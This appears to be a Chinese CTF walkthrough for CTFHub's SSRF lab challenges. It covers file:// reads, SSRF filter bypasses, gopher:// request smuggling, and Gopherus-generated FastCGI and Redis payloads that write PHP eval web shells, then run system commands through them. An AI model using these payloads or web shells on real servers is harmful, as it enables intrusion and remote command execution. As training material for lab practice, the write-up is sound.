1. 内网访问
url后面输入http:// 127.0.0.1/flag.php,得到Flag
2. 伪协议读取文件
url后面输入file:///var/www/html/flag.php,然后右击页面查看页面源代码,得到Flag
3. 端口扫描
第一步:在url后面输入http://127.0.0.1:5000,对本页面抓包,右击抓包界面,发送到Intruder
第二步:点击Intruder,添加扫描位置
第三步:配置以下参数,开始攻击
第四步:点击长度》排序,找到和其他长度不一样的一条,点击美化找到Flag
4. POST请求
第一步:在url后加入http:127.0.0.1:80/flag.php访问,右击页面发现key,将key复制到输入框,回车访问
第二步:打开Burp Suite抓包,修改抓到的包
第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码
第四步:在url后加入gopher://127.0.0.1:80/_后面再跟上最后编码得到内容,访问得到flag
5. 上传文件
第一步:打开链接在url后面输入http://127.0.0.1:80/flag.php访问,右击页面》检查,选中如图input标签》右击》编辑HTML,添加<input type="sumbit" name="sumbit">,因为本页面没有提交按钮所以我们手动创建一个
第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变
第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码
第四步:在url后加入gopher://127.0.0.1:80/_后面再跟上最后编码得到内容,访问得到flag
6. FastCGI协议
第一步:打开kali,下载好工具Gopherus-master,在文件夹里打开终端
第二步:依次输入以下命令
python2 gopherus.py --exploit fastcgi
/var/www/html/index.php
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php
生成写入木马的响应包,复制响应的内容
第三步:对上面响应的内容用在线URL工具编码
第四步:给目标网站写入木马,将编码好的内容复制到url后面并访问,发现有响应内容我们进行下一步
第五步:在网站后输入shell.php,去访问shell.php,没有响应错误说明木马植入成功
第六步:打开中国菜刀右击界面添加url链接,将上一步的访问的url复制到此处,添加参数cmd,双击运行
第七步:找到/flag文件打开,找到本题的flag
7. Redis协议
第一步:打开kali,下载好工具Gopherus-master,在文件夹里打开终端
第二步:依次输入以下命令
python2 gopherus.py --exploit redis
/var/www/html
PHPShell
<?php @eval($_GET['cmd']); ?>
生成写入木马的响应包,复制响应的内容
第三步:对上面响应的内容用在线URL工具编码
第四步:给目标网站写入木马,将编码好的内容复制到url后面并访问
第五步:在网站后输入shell.php,去访问shell.php,如果有响应的内容说明木马植入成功
第六步:在url上输入/shell.php?cmd=system(‘ls /’);找到flag的文件
第七步:在url上输入/shell.php?cmd=system(‘cat /刚刚的flag文件名’);找到flag
8. URL Bypass
url后面输入http://[email protected]:80/flag.php,得到Flag
9. 数字IP Bypass
url后面输入http://localhost/flag.php,得到Flag
或者将127.0.0.1转换成16进制7F000001,url后面输入http://0x7F000001/flag.php,得到Flag
10. 302跳转 Bypass
url后面输入http://localhost/flag.php,得到Flag
11. DNS重绑定 Bypass
第一步:在解析网站上获取解析到内网IP的域名并作访问即可获取其Flag
附:网站地址rbndr.us dns rebinding service
第二步:在url后面输入http://7f000001.7f000002.rbndr.us/flag.php,得到Flag
标签:Web,http,SSRF,编码,CTFHub,Flag,url,flag,php From: https://blog.csdn.net/m0_59151303/article/details/140673856